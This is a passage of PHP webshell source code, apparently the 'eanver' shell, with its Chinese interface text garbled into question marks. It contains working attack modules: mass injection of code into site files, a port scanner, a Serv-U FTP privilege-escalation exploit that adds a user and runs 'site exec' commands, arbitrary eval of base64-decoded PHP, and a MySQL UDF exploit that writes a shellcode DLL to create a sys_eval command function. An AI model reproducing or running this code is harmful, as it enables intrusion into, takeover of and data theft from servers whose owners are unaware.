'.$upload; } } } html_n(''); break; case "guama": $patht = isset($_POST['path']) ? $_POST['path'] : root_dir; $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx"; $codet = isset($_POST['code']) ? $_POST['code'] : ""; html_n('
??????"|"??,?????????.

'); html_input("text","path",$patht,"????","45"); html_input("checkbox","pass","","??????","",true); html_input("text","type",$typet,"

????","60"); html_text("code","67","5",$codet); html_n('

'); html_radio("????","????","guama","qingma"); html_input("submit","passreturn","??"); html_n('
????:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($patht,$codet,$_POST['return'],$bool,$typet); } break; case "tihuan": html_n('
????????????,?????.

'); html_input("text","path",root_dir,"????","45"); html_input("checkbox","pass","","??????","",true); html_text("newcode","67","5",$_POST['newcode']); html_n('

???'); html_text("oldcode","67","5",$_POST['oldcode']); html_input("submit","passreturn","??","

"); html_n('
????:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']); } break; case "scanfile": css_js("4"); html_n('
?????????????MYSQL?????????,????.
?????????,???????,?????????.

'); html_input("text","path",root_dir,"???","45"); html_input("checkbox","pass","","??????","",true); html_input("text","code",$_POST['code'],"

???","40"); html_select(array("--MYSQL????--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'"); html_n('

'); html_radio("?????","??????","scanfile","scancode"); html_input("submit","passreturn","??"); html_n('
????:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool); } break; case "scanphp": html_n('
???????????,?????????????.

'); html_input("text","path",root_dir,"????","40"); html_input("checkbox","pass","","??????

????","",true); html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP")); html_input("submit","passreturn","??","

"); html_n('
????:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool); } break; case "port": $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1'; $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|8080|43958|5631|2049|873|999'; print<<
??IP
???
END; if((!empty($_POST['ip'])) && (!empty($_POST['port']))) { echo '
'; $ports = explode('|', $_POST['port']); for($i = 0;$i < count($ports);$i++) { $fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2); echo $fp ? '???? ---> '.$ports[$i].'
' : '???? ---> '.$ports[$i].'
'; ob_flush(); flush(); } echo '
'; } break; case "getcode": if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "

?? URL ????

";exit;} print<<
????

  • ?????????? HTTP ??,?????????????????CSS???.
  • ????????????????URL,???? SQL Injection ??????????.
  • ??????? URL,?????????IP??? : {$_SERVER['SERVER_NAME']}
URL:
END; break; case "servu": $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; print<<[????] [????]
ServU??
ServU??
ServU??
END; if($_GET['o'] == 'adduser') { print<<?? ?? ?? END; } else { print<<????
END; } echo '
'; if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) { echo '
'; $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n". "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n". "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n"; $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; $sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10); $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; if(!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10); $recvbuf = @fgets($exp, 1024); echo "?????: $recvbuf
"; $sendbuf = "USER ".$_POST['user']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "?????: $recvbuf
"; $sendbuf = "PASS ".$_POST['password']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "?????: $recvbuf
"; $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "?????: site exec ".$_POST["SUCommand"]."
"; $recvbuf = @fgets($exp, 1024); echo "?????: $recvbuf
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; @fclose($exp); } @fclose($sock); echo '
'; } break; case "phpcode": $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();"; if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode)); echo '
???<? ?>??,???????BASE64????,????????,?????(????,????)



'; if(!empty($_POST['phpcode'])){ echo "

"; eval(stripslashes(base64_decode($_POST['phpcode']))); } html_n('
'); break; case "myexp": $MSG_BOX = '????DLL,?????.MYSQL?????root??,?????????DLL??.'; $info = '????'; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { @$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd']; $conn = mysql_connect($mhost.':'.$mport,$muser,$mpass); if($conn) { @mysql_select_db($mdata); /*************************************/ $str=mysql_get_server_info(); //echo 'MYSQL??:'.$str." "; if($str[2]>=1){ $sql="SHOW VARIABLES LIKE '%plugin_dir%'"; $row=mysql_query($sql,$conn); $rows=mysql_fetch_row($row); $pa=str_replace('\\','/',$rows[1]); $path=$pa.'/'.$BH; }else{ $path='C:/WINDOWS/'.$BH; } //$mpath=$path; if(!empty($mpath)) { $mpath=$mpath; }else{ $mpath=$path; } /*************************************/ if((!empty($_POST['outdll'])) && (!empty($mpath))) { $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);"; if(@mysql_query($query,$conn)) { $shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode(); $query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));"; if(@mysql_query($query,$conn)) { $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';'; if(@mysql_query($query,$conn)) { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function sys_eval returns string soname \''.$inpath.'\';'; $MSG_BOX = @mysql_query($query,$conn) ? '??DLL??' 
: '??DLL??'.mysql_error(); } else $MSG_BOX = '??DLL????'.mysql_error(); } else $MSG_BOX = '???????'; @mysql_query('DROP TABLE Envl_Temp_Tab;',$conn); } else $MSG_BOX = '???????'; } if(!empty($_POST['runcmd'])) { $query = 'select sys_eval("'.$sqlcmd.'");'; $result = @mysql_query($query,$conn); if($result) { $k = 0; $info = NULL; while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;} $info = $infotmp; $MSG_BOX = '????'; } else $MSG_BOX = '????'; } } else $MSG_BOX = '??MYSQL??'; } print<<
{$MSG_BOX}
?? ?? ?? ?? ??
????(????) 64?MYSQL
?????MYSQL


END; break; case "mysql_exec": if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) { if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass'])) { $cookietime = time() + 24 * 3600; setcookie('m_eanverhost',$_POST['mhost'],$cookietime); setcookie('m_eanverport',$_POST['mport'],$cookietime); setcookie('m_eanveruser',$_POST['muser'],$cookietime); setcookie('m_eanverpass',$_POST['mpass'],$cookietime); die('????,???...'); } } print<<
??
??
??
??
END; break; case "mysql_msg": $conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']); if($conn) { print<< function Delok(msg,gourl) { smsg = "?????[" + unescape(msg) + "]??"; if(confirm(smsg)){window.location = gourl;} window.location = gourl; } function Createok(ac) { if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);'; if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;'; if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;'; return false; } END; html_base(); print<< END; $BOOL = false; $MSG_BOX = '??:'.$_COOKIE['m_eanveruser'].'      ??:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].'      ??:'; $k = 0; $result = @mysql_query('select version();',$conn); while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} echo '
???:'; $result = mysql_query("SHOW DATABASES",$conn); while($db = mysql_fetch_array($result)){echo '  ['.$db['Database'].']';} echo '
'; if(isset($_GET['db'])) { mysql_select_db($_GET['db'],$conn); $_POST['nsql']=base64_decode($_POST['nsql']); if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '????' : '???? '.mysql_error();} if(is_array($_POST['insql'])) { $query = 'INSERT INTO '.$_GET['table'].' ('; foreach($_POST['insql'] as $var => $key) { $querya .= $var.','; $queryb .= '\''.addslashes($key).'\','; } $query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');'; $MSG_BOX = mysql_query($query,$conn) ? '????' : '???? '.mysql_error(); } if(is_array($_POST['upsql'])) { $query = 'UPDATE '.$_GET['table'].' SET '; foreach($_POST['upsql'] as $var => $key) { $queryb .= $var.'=\''.addslashes($key).'\','; } $query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';'; $MSG_BOX = mysql_query($query,$conn) ? '????' : '???? '.mysql_error(); } if(isset($_GET['del'])) { $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn); $good = mysql_fetch_assoc($result); $query = 'DELETE FROM '.$_GET['table'].' WHERE '; foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';} $where = $query.substr($queryc, 0, -4).';'; $MSG_BOX = mysql_query($where,$conn) ? '????' : '???? '.mysql_error(); } $action = '?eanver=mysql_msg&db='.$_GET['db']; if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '????' : '???? '.mysql_error();} if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];} if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert']; echo '
'; echo ' '; echo ''; echo ' '; echo ' '; echo '
'; echo '
'.$MSG_BOX.'
'.$_GET['db'].' ---> '; if(isset($_GET['table'])) { echo ''.$_GET['table'].' '; echo '[??]
'; if(isset($_GET['edit'])) { if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table']; echo '
'; $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn); $good = mysql_fetch_assoc($result); $u = 0; foreach($good as $var => $key) { $queryc .= $var.'=\''.$key.'\' AND '; $type = @mysql_field_type($result, $u); $len = @mysql_field_len($result, $u); echo '
'.$var.' '.$type.'('.$len.')
'; $u++; } $where = 'WHERE '.substr($queryc, 0, -4); echo ''; echo '
'; } else { $query = 'SHOW COLUMNS FROM '.$_GET['table']; $result = mysql_query($query,$conn); $fields = array(); $pagesize=20; $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn)); $numrows=$row_num; $pages=intval($numrows/$pagesize); if ($numrows%$pagesize) $pages++; $offset=$pagesize*($page - 1); $page=$_GET['p']; if(!$page) $page=1; if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20; echo ''; echo ''; while($row = @mysql_fetch_assoc($result)) { array_push($fields,$row['Field']); echo ''; } echo ''; if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;'; $result = mysql_query($query,$conn); $v = $p; while($text = @mysql_fetch_assoc($result)) { echo ''; foreach($fields as $row){echo '';} echo ''."\r\n";$v++; } echo '
??'.$row['Field'].'
?? '; echo ' ?? '.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'
'; $pagep=$page-1; $pagen=$page+1; echo "?? ".$row_num." ??? "; if($pagep>0) $pagenav.=" ?? ??? "; else $pagenav.=" ??? "; if($pagen<=$pages) $pagenav.=" ??? ??"; else $pagenav.=" ??? "; $pagenav.=" ? [".$page."/".$pages."] ? ??

 



